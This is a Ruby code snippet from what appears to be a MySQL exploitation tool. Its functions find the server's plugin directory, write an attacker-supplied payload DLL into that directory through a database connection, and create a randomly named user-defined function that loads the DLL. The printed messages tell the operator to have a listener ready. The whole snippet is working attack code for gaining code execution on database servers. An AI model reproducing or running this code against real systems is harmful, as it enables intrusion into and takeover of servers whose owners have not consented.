# Code Snippet continuation, by HR

# Determine Plugin Directory
# This is where we need to write UDF to
# Pass in the MySQL connection object (dbc)
def get_plugin_dir(dbc)
  begin
    q = dbc.query(\'SELECT @@plugin_dir;\')
    q.each { |x| @pdir=x[0]; }
    if @pdir.nil?
      q = dbc.query("SHOW VARIABLES LIKE \'basedir\';")
      q.each { |x| @pdir=x[1]; }
      plugpath = @pdir.split("\\\\").join("\\\\\\\\")
      plugpath += "\\\\\\\\lib\\\\\\\\plugin\\\\\\\\"
    else
      plugpath = @pdir.split("\\\\").join("\\\\\\\\")
      plugpath += "\\\\\\\\"
    end
    return plugpath
  rescue Mysql::Error => e
    puts "Problem determining the plugins directory!"
    puts "\\t=> #{e}"
    puts "Sorry, can\'t continue without this piece....\\n\\n"
    exit 666;
  end
end

# Create new function tied to custom DLL
# Once created (and called) it should trigger the DLL payload
def create_custom_function(dbc, file)
  dll_name = randz(15) + ".dll"
  plugin_path = get_plugin_dir(dbc)
  @udf_dest = plugin_path.chomp + dll_name
  fake_function = \'sys_\' + randz(5)

  # Upload our UDF DLL Payload file
  if write_bin_file(dbc, file, @udf_dest)
    begin
      puts "Payload DLL writen to disk!"
      puts "Creating function to trigger now...."
      puts "Make sure your listener is ready...."
      sleep(3)
      # Drop function if its already there, then create new
      q = dbc.query("DROP FUNCTION IF EXISTS #{fake_function};")
      q = dbc.query("CREATE FUNCTION #{fake_function} RETURNS string SONAME \'#{dll_name}\';")
      return fake_function
    rescue Mysql::Error => e
      puts "Error Triggered, Payload should have also been triggered!"
      return fake_function
    end
  end
end